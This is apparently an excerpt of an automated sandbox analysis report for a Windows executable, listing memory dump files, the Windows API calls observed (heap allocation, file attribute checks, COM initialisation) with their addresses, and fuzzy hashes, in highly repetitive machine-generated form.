                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                            • Opcode ID: 7e93ec3adc7182f0faa5ed0abbbff69f68e87d14e700d6fd08e970bbf9f62068
                                                                                                                                            • Instruction ID: 65476dc548cb86d4914c816a14a0f8bb5a9eb51de57e28d979733bf972230af3
                                                                                                                                            • Opcode Fuzzy Hash: 7e93ec3adc7182f0faa5ed0abbbff69f68e87d14e700d6fd08e970bbf9f62068
                                                                                                                                            • Instruction Fuzzy Hash: 5AE12B70F0025497DF25BB28CD077AE7E61AB42714FA042AEE815673C2DB7D4E4187CA

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 826 4cd82f-4cd83a 827 4cd83c-4cd846 826->827 828 4cd848-4cd84e 826->828 827->828 829 4cd87c-4cd887 call 4c75f6 827->829 830 4cd867-4cd878 RtlAllocateHeap 828->830 831 4cd850-4cd851 828->831 835 4cd889-4cd88b 829->835 832 4cd87a 830->832 833 4cd853-4cd85a call 4c9dc0 830->833 831->830 832->835 833->829 839 4cd85c-4cd865 call 4c8e36 833->839 839->829 839->830
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004CA813,00000001,00000364,00000006,000000FF,?,004CEE3F,?,00000004,00000000,?,?), ref: 004CD870
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 9d0e0d8e50781ebd30158c634a5f7434021e1bdb3294f7fefb74f8622d6e0c2a
                                                                                                                                            • Instruction ID: 882fd67b41abde1c93ebef772f9a28dec6c605c363ccc7923b3111c650a70418
                                                                                                                                            • Opcode Fuzzy Hash: 9d0e0d8e50781ebd30158c634a5f7434021e1bdb3294f7fefb74f8622d6e0c2a
                                                                                                                                            • Instruction Fuzzy Hash: 16F0E93AD0512466EFA13A779C01F5B37599F41770B17803FBC24A7291DA28DC0185F9
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0049DA1D,?,?,?,?), ref: 004987B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 3968fe63c40348f35ef298825a20ce48a72720d6d4fd53803469cdbcea1a5557
                                                                                                                                            • Instruction ID: 51e43e3ad073ef8288cd6bc97a1d8d8b42a619a8faf507e9d755f705e2fd9768
                                                                                                                                            • Opcode Fuzzy Hash: 3968fe63c40348f35ef298825a20ce48a72720d6d4fd53803469cdbcea1a5557
                                                                                                                                            • Instruction Fuzzy Hash: EAC08C280116000AFD1C05BC0A848AA37454A977B83F41FEDE0B04B3E1DE3D68079218
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0049DA1D,?,?,?,?), ref: 004987B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: e431a9d792425cbaefadfac531d17316e3a6bb38fad1b3100d12e83015fd4ecf
                                                                                                                                            • Instruction ID: 31414cc0c54d4c981fd223323b45dfc310c8f8bc74c859bf1965172c8500d145
                                                                                                                                            • Opcode Fuzzy Hash: e431a9d792425cbaefadfac531d17316e3a6bb38fad1b3100d12e83015fd4ecf
                                                                                                                                            • Instruction Fuzzy Hash: 37C08C380112004AFE1C4ABC4A848263A059A5372D3F00FEDE0714B3E1DF3ED403C6A8
                                                                                                                                            APIs
                                                                                                                                            • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0049B3C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
